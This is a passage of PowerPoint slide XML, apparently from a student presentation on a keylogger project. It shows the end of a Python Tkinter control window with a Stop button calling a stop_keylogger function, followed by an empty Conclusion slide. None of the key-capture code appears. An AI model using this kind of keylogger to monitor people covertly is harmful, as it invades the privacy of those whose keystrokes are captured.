              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(side=LEFT)</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1" latinLnBrk="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, state='disabled')</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1" latinLnBrk="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(side=RIGHT)</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1" latinLnBrk="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("250x250")</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1" latinLnBrk="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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9" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048610" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN">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11" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1" dirty="0" sz="2000" lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-US">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dirty="0" sz="2000" lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048612"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kings engineering college</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-25T18:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-22T09:51:29Z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80065377ef9a42b5ad37253f27b31614</vt:lpwstr>
  </property>
</Properties>
</file>